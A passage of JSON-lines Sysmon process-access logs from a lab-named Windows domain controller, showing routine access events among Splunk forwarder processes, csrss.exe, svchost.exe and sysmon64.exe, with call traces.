Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7186,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00106B800A00}\r\nTargetProcessId: 4544\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00106B800A00}","TargetProcessId":"4544","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7187,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7188,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7189,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7190,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7191,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7192,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.525","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7193,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.525\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 